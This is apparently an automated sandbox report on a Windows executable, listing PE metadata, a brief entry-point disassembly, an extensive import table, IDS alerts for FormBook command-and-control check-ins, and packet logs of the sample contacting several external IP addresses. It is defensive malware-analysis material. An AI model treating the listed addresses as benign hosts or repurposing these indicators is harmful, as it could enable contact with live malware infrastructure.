                                                      TLSH:5D45CF2273DDC360CB669173BF69B7016EBF7C614630B85B2F880D7DA950162162DBA3
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                      Icon Hash:aaf3e3e3938382a0
                                                      Entrypoint:0x427dcd
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x675AE4F9 [Thu Dec 12 13:28:25 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:1
                                                      File Version Major:5
                                                      File Version Minor:1
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:1
                                                      Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                      Instruction
                                                      call 00007F8908EC266Ah
                                                      jmp 00007F8908EB5434h
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      push edi
                                                      push esi
                                                      mov esi, dword ptr [esp+10h]
                                                      mov ecx, dword ptr [esp+14h]
                                                      mov edi, dword ptr [esp+0Ch]
                                                      mov eax, ecx
                                                      mov edx, ecx
                                                      add eax, esi
                                                      cmp edi, esi
                                                      jbe 00007F8908EB55BAh
                                                      cmp edi, eax
                                                      jc 00007F8908EB591Eh
                                                      bt dword ptr [004C31FCh], 01h
                                                      jnc 00007F8908EB55B9h
                                                      rep movsb
                                                      jmp 00007F8908EB58CCh
                                                      cmp ecx, 00000080h
                                                      jc 00007F8908EB5784h
                                                      mov eax, edi
                                                      xor eax, esi
                                                      test eax, 0000000Fh
                                                      jne 00007F8908EB55C0h
                                                      bt dword ptr [004BE324h], 01h
                                                      jc 00007F8908EB5A90h
                                                      bt dword ptr [004C31FCh], 00000000h
                                                      jnc 00007F8908EB575Dh
                                                      test edi, 00000003h
                                                      jne 00007F8908EB576Eh
                                                      test esi, 00000003h
                                                      jne 00007F8908EB574Dh
                                                      bt edi, 02h
                                                      jnc 00007F8908EB55BFh
                                                      mov eax, dword ptr [esi]
                                                      sub ecx, 04h
                                                      lea esi, dword ptr [esi+04h]
                                                      mov dword ptr [edi], eax
                                                      lea edi, dword ptr [edi+04h]
                                                      bt edi, 03h
                                                      jnc 00007F8908EB55C3h
                                                      movq xmm1, qword ptr [esi]
                                                      sub ecx, 08h
                                                      lea esi, dword ptr [esi+08h]
                                                      movq qword ptr [edi], xmm1
                                                      lea edi, dword ptr [edi+08h]
                                                      test esi, 00000007h
                                                      je 00007F8908EB5615h
                                                      bt esi, 03h
                                                      jnc 00007F8908EB5668h
                                                      Programming Language:
                                                      • [ASM] VS2013 build 21005
                                                      • [ C ] VS2013 build 21005
                                                      • [C++] VS2013 build 21005
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      • [ASM] VS2013 UPD4 build 31101
                                                      • [RES] VS2013 build 21005
                                                      • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5cc58 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x124000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x5cc58 | 0x5ce00 | a8c720a710d1263dc396eea8c91f9907 | False | 0.9287359101615074 | data | 7.897398953683963 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x124000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x53f1d | data | | | 1.0003228273862323
RT_GROUP_ICON | 0x1236d8 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x123750 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x123764 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x123778 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x12378c | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x123868 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, 
DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                      GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                      COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                      OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-13T13:18:12.563243+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.24 | 49777 | 103.23.149.28 | 80 | TCP
2024-12-13T13:18:29.342602+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.24 | 49781 | 84.32.84.32 | 80 | TCP
2024-12-13T13:18:32.027554+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.24 | 49785 | 84.32.84.32 | 80 | TCP
2024-12-13T13:18:33.730010+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.24 | 49786 | 84.32.84.32 | 80 | TCP
2024-12-13T13:18:37.445528+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.24 | 49788 | 84.32.84.32 | 80 | TCP
2024-12-13T13:18:44.629294+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.24 | 49789 | 172.67.155.214 | 80 | TCP
2024-12-13T13:18:47.329255+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.24 | 49790 | 172.67.155.214 | 80 | TCP
2024-12-13T13:18:48.604997+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.24 | 49791 | 172.67.155.214 | 80 | TCP
2024-12-13T13:18:52.731892+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.24 | 49792 | 172.67.155.214 | 80 | TCP
2024-12-13T13:19:00.074872+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.24 | 49793 | 199.59.243.227 | 80 | TCP
2024-12-13T13:19:02.748122+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.24 | 49794 | 199.59.243.227 | 80 | TCP
2024-12-13T13:19:04.476937+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.24 | 49795 | 199.59.243.227 | 80 | TCP
2024-12-13T13:19:08.144035+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.24 | 49796 | 199.59.243.227 | 80 | TCP
2024-12-13T13:19:15.104234+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.24 | 49797 | 199.59.243.227 | 80 | TCP
2024-12-13T13:19:17.766303+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.24 | 49799 | 199.59.243.227 | 80 | TCP
2024-12-13T13:19:19.611952+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.24 | 49801 | 199.59.243.227 | 80 | TCP
2024-12-13T13:19:23.813931+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.24 | 49803 | 199.59.243.227 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 13:18:10.853281975 CET | 49777 | 80 | 192.168.2.24 | 103.23.149.28
Dec 13, 2024 13:18:10.973632097 CET | 80 | 49777 | 103.23.149.28 | 192.168.2.24
Dec 13, 2024 13:18:10.973752975 CET | 49777 | 80 | 192.168.2.24 | 103.23.149.28
Dec 13, 2024 13:18:10.985869884 CET | 49777 | 80 | 192.168.2.24 | 103.23.149.28
Dec 13, 2024 13:18:11.105835915 CET | 80 | 49777 | 103.23.149.28 | 192.168.2.24
Dec 13, 2024 13:18:12.562987089 CET | 80 | 49777 | 103.23.149.28 | 192.168.2.24
Dec 13, 2024 13:18:12.563091040 CET | 80 | 49777 | 103.23.149.28 | 192.168.2.24
Dec 13, 2024 13:18:12.563242912 CET | 49777 | 80 | 192.168.2.24 | 103.23.149.28
Dec 13, 2024 13:18:12.567729950 CET | 49777 | 80 | 192.168.2.24 | 103.23.149.28
Dec 13, 2024 13:18:12.687436104 CET | 80 | 49777 | 103.23.149.28 | 192.168.2.24
Dec 13, 2024 13:18:28.121227980 CET | 49781 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:28.241050959 CET | 80 | 49781 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:28.243556023 CET | 49781 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:28.271305084 CET | 49781 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:28.392421007 CET | 80 | 49781 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:29.342545033 CET | 80 | 49781 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:29.342602015 CET | 49781 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:29.781531096 CET | 49781 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:29.901572943 CET | 80 | 49781 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:30.806364059 CET | 49785 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:30.926476955 CET | 80 | 49785 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:30.926592112 CET | 49785 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:30.945507050 CET | 49785 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:31.065479040 CET | 80 | 49785 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:32.027436018 CET | 80 | 49785 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:32.027554035 CET | 49785 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:32.455411911 CET | 49785 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:32.575212955 CET | 80 | 49785 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:33.471445084 CET | 49786 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:33.592283010 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:33.594007015 CET | 49786 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:33.608782053 CET | 49786 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:33.729629993 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:33.729666948 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:33.729695082 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:33.729747057 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:33.729774952 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:33.729962111 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:33.729993105 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:33.730010033 CET | 49786 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:33.730117083 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:33.730194092 CET | 49786 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:33.730257988 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:33.730284929 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:33.730423927 CET | 49786 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:33.850111008 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:33.850155115 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:33.850183964 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:33.850193977 CET | 49786 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:33.850233078 CET | 49786 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:33.850239038 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:33.850250959 CET | 49786 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:33.850294113 CET | 49786 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:33.850753069 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:33.850795984 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:33.890871048 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:34.019323111 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:34.692732096 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:34.692827940 CET | 49786 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:35.142658949 CET | 49786 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:35.262727976 CET | 80 | 49786 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:36.157857895 CET | 49788 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:36.278362036 CET | 80 | 49788 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:36.278579950 CET | 49788 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:36.288033009 CET | 49788 | 80 | 192.168.2.24 | 84.32.84.32
Dec 13, 2024 13:18:36.407958031 CET | 80 | 49788 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:37.445281982 CET | 80 | 49788 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:37.445369005 CET | 80 | 49788 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:37.445426941 CET | 80 | 49788 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:37.445461988 CET | 80 | 49788 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:37.445497990 CET | 80 | 49788 | 84.32.84.32 | 192.168.2.24
Dec 13, 2024 13:18:37.445530891 CET | 80 | 49788 | 84.32.84.32 | 192.168.2.24
